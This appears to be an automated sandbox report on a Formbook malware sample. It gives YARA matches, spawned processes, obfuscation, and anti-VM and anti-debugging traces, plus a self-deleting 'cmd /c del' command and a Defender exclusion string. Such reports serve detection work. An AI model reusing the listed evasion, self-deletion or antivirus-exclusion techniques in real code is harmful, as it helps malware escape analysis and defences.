Source: ox87DNNM8d.exe, 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.237220905.0000000006230000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.280995621.0000000001068000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.281676487.0000000001BBF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Uses 32bit PE files
Source: ox87DNNM8d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: ox87DNNM8d.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@4/3
Source: C:\Users\user\Desktop\ox87DNNM8d.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ox87DNNM8d.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: ox87DNNM8d.exe Virustotal: Detection: 56%
Source: ox87DNNM8d.exe Metadefender: Detection: 38%
Source: ox87DNNM8d.exe ReversingLabs: Detection: 65%
Source: unknown Process created: C:\Users\user\Desktop\ox87DNNM8d.exe 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ox87DNNM8d.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: ox87DNNM8d.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ox87DNNM8d.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5CFB8 push edx; ret 1_2_00B5CFF4
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5C8C0 push eax; retf 1_2_00B5C861
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5DBCA push eax; retf 1_2_00B5DB6B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5D21C push eax; retf 1_2_00B5D1BD
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5D966 push edx; ret 1_2_00B5D9A2
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5C65C push edx; ret 1_2_00B5C698
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642674D push es; ret 1_2_06426754
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06426799 push es; ret 1_2_0642679C
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00401028 push ds; ret 3_2_0040102C
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_004171DE push 974CB969h; retf 3_2_004171E6
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_004172CC push edx; ret 3_2_004172D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00416BC9 push es; retf 3_2_00416BDC
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_004163B0 push ss; ret 3_2_004163C6
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBC8C0 push eax; retf 3_2_00FBC861
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBD966 push edx; ret 3_2_00FBD9A2
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBD21C push eax; retf 3_2_00FBD1BD
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBDBCA push eax; retf 3_2_00FBDB6B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBC65C push edx; ret 3_2_00FBC698
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBCFB8 push edx; ret 3_2_00FBCFF4
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045ED0D1 push ecx; ret 8_2_045ED0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_001871DE push 974CB969h; retf 8_2_001871E6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_001872CC push edx; ret 8_2_001872D8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_001863B0 push ss; ret 8_2_001863C6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00186BC9 push es; retf 8_2_00186BDC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CEA5 push eax; ret 8_2_0018CEF8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CEFB push eax; ret 8_2_0018CF62
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CEF2 push eax; ret 8_2_0018CEF8
Source: initial sample Static PE information: section name: .text entropy: 7.93204508639

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ox87DNNM8d.exe PID: 4368, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ox87DNNM8d.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ox87DNNM8d.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000001798E4 second address: 00000000001798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 0000000000179B4E second address: 0000000000179B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5636 Thread sleep time: -101791s >= -30000s
Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2268 Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 2268 Thread sleep time: -68000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 6548 Thread sleep time: -70000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 101791
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000002.501948287.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000004.00000000.237589481.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}##
Source: explorer.exe, 00000004.00000002.508140093.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0040ACC0 LdrLoadDll, 3_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04661074 mov eax, dword ptr fs:[00000030h] 8_2_04661074
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04652073 mov eax, dword ptr fs:[00000030h] 8_2_04652073
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0462C450 mov eax, dword ptr fs:[00000030h] 8_2_0462C450
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B746D mov eax, dword ptr fs:[00000030h] 8_2_045B746D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h] 8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h] 8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h] 8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CBC2C mov eax, dword ptr fs:[00000030h] 8_2_045CBC2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04664015 mov eax, dword ptr fs:[00000030h] 8_2_04664015
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h] 8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_046514FB mov eax, dword ptr fs:[00000030h] 8_2_046514FB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668CD6 mov eax, dword ptr fs:[00000030h] 8_2_04668CD6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599080 mov eax, dword ptr fs:[00000030h] 8_2_04599080
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CF0BF mov ecx, dword ptr fs:[00000030h] 8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CF0BF mov eax, dword ptr fs:[00000030h] 8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04613884 mov eax, dword ptr fs:[00000030h] 8_2_04613884
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D90AF mov eax, dword ptr fs:[00000030h] 8_2_045D90AF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B7D50 mov eax, dword ptr fs:[00000030h] 8_2_045B7D50
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D3D43 mov eax, dword ptr fs:[00000030h] 8_2_045D3D43
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BB944 mov eax, dword ptr fs:[00000030h] 8_2_045BB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04613540 mov eax, dword ptr fs:[00000030h] 8_2_04613540
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B171 mov eax, dword ptr fs:[00000030h] 8_2_0459B171
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045BC577 mov eax, dword ptr fs:[00000030h] 8_2_045BC577
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04668D34 mov eax, dword ptr fs:[00000030h] 8_2_04668D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h] 8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C513A mov eax, dword ptr fs:[00000030h] 8_2_045C513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h] 8_2_045C4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459AD30 mov eax, dword ptr fs:[00000030h] 8_2_0459AD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 mov ecx, dword ptr fs:[00000030h] 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04648DF1 mov eax, dword ptr fs:[00000030h] 8_2_04648DF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h] 8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h] 8_2_04592D8A
